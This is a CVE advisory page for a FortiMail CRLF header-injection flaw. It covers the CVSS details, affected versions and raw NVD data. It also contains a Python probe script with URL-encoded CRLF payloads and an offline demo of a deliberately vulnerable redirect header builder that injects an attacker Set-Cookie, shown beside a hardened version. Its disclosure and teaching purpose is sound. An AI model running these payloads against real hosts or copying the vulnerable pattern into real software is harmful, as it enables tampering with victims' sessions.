Security Vulnerability Report
CVE-2025-54972 CVSS 4.3 MEDIUM

CVE-2025-54972

Published: 2025-11-18 17:16:04
Last Modified: 2026-01-14 10:16:06

Description

An improper neutralization of CRLF sequences ('CRLF injection', CWE-93) vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2 (all versions) and FortiMail 7.0 (all versions) may allow an unauthenticated attacker to inject headers into the HTTP response by convincing a user to click on a specifically crafted link. The CVSS vector below reflects this: no privileges are required, but user interaction is needed and the impact is limited to integrity (the victim's own response is tampered with, no data is disclosed).

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* (7.0.0 up to, but excluding, 7.4.6) - VULNERABLE
cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* (7.6.0 up to, but excluding, 7.6.4) - VULNERABLE
FortiMail 7.0.x - all versions
FortiMail 7.2.x - all versions
FortiMail 7.4.0 - 7.4.5
FortiMail 7.6.0 - 7.6.3

The two CPE ranges come from the NVD record: 7.4.6 and 7.6.4 are the first releases outside the vulnerable ranges, while the 7.0 and 7.2 branches have no unaffected release listed in the data.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-54972 CRLF Injection PoC
# Target: FortiMail < 7.4.6, < 7.6.4


def test_crlf_injection(url):
    """
    Test for CRLF injection vulnerability in FortiMail.
    Inject a header via a crafted URL parameter and look for it in the response.
    """
    # Malicious payload with CRLF sequences
    # %0d%0a = \r\n (URL encoded CRLF)
    payload = "%0d%0aX-Injected-Header: malicious-value"

    # Target endpoint - adjust based on actual vulnerable parameter.
    # The path and parameter name below are the PoC's placeholders; they are
    # not confirmed by the advisory data on this page.
    target_url = f"{url}/fcgi/saml2?redirect={payload}"

    try:
        # allow_redirects=False: a reflected header usually sits on the 3xx
        # response itself; following the redirect would hide it behind the
        # final page's headers.
        response = requests.get(target_url, timeout=10, allow_redirects=False)

        # Check if injected header appears in the response
        if 'X-Injected-Header' in response.headers:
            print("[+] VULNERABLE: CRLF injection detected!")
            print(f"[+] Injected header: {response.headers.get('X-Injected-Header')}")
            return True
        print("[-] Not vulnerable or payload not reflected")
        return False
    except requests.RequestException as e:
        print(f"[!] Error: {e}")
        return False


# Example usage
if __name__ == "__main__":
    target = "https://vulnerable-fortimail.example.com"
    test_crlf_injection(target)
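The PoC above only probes a live host. The following is an added example, not code from the original page or from Fortinet, that models the mechanism behind CWE-93 offline: a hypothetical server copies a user-controlled `redirect` query parameter into a `Location` header. The vulnerable builder emits the decoded CR/LF bytes verbatim, so a client parsing the response sees an attacker-chosen `Set-Cookie` header; the hardened builder rejects any control character (and off-site targets) before the value reaches the header block. The host, path, parameter name and crafted link are all constructed placeholders, not details from the advisory.

```python
from urllib.parse import parse_qs, urlparse

# Constructed crafted link (placeholder host/path): the victim clicks it,
# the server reflects the `redirect` value into a response header.
CRAFTED_LINK = ("https://mail.example.test/login"
                "?redirect=/inbox%0d%0aSet-Cookie:%20session=attacker")
BENIGN_LINK = "https://mail.example.test/login?redirect=/inbox"


def _redirect_target(request_url):
    """Extract the redirect parameter; parse_qs percent-decodes, so
    %0d%0a arrives here as a real CR LF pair."""
    qs = parse_qs(urlparse(request_url).query)
    return qs.get("redirect", ["/"])[0]


def vulnerable_headers(request_url):
    """CWE-93: the decoded value is concatenated straight into the header
    block, so CR LF inside it terminates the Location line early."""
    target = _redirect_target(request_url)
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n")


def is_safe_header_value(value):
    """Reject CR, LF and every other control byte (0x00-0x1f, 0x7f)."""
    return not any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def hardened_headers(request_url):
    """Same response, but the value is validated before it is emitted and
    the redirect is kept local (no scheme, no protocol-relative //host)."""
    target = _redirect_target(request_url)
    if not is_safe_header_value(target):
        raise ValueError("control character in redirect target")
    if not target.startswith("/") or target.startswith("//"):
        raise ValueError("off-site redirect rejected")
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n")


def parse_response_headers(raw):
    """Split the header block the way an HTTP client does: one header per
    CR LF terminated line. This is what makes the injected line 'real'."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


if __name__ == "__main__":
    print(parse_response_headers(vulnerable_headers(CRAFTED_LINK)))
    try:
        hardened_headers(CRAFTED_LINK)
    except ValueError as exc:
        print("hardened build rejected the link:", exc)
```

Running it shows the vulnerable build producing a `Set-Cookie` header the server never intended, while the hardened build raises before any header is written. The check is deliberately a reject, not a strip: silently removing CR/LF still lets the rest of an attacker-shaped value through, and an error is easier to alert on.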

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-634 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54972", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:03.890", "lastModified": "2026-01-14T10:16:06.210", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of crlf sequences ('crlf injection') vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2 all versions, FortiMail 7.0 all versions may allow an attacker to inject headers in the response via convincing a user to click on a specifically crafted link"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "5982EF2E-C0FD-4FEB-B275-A69EAE436C17"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "6F11D4E8-2671-408A-8028-005ABD367084"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-634", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}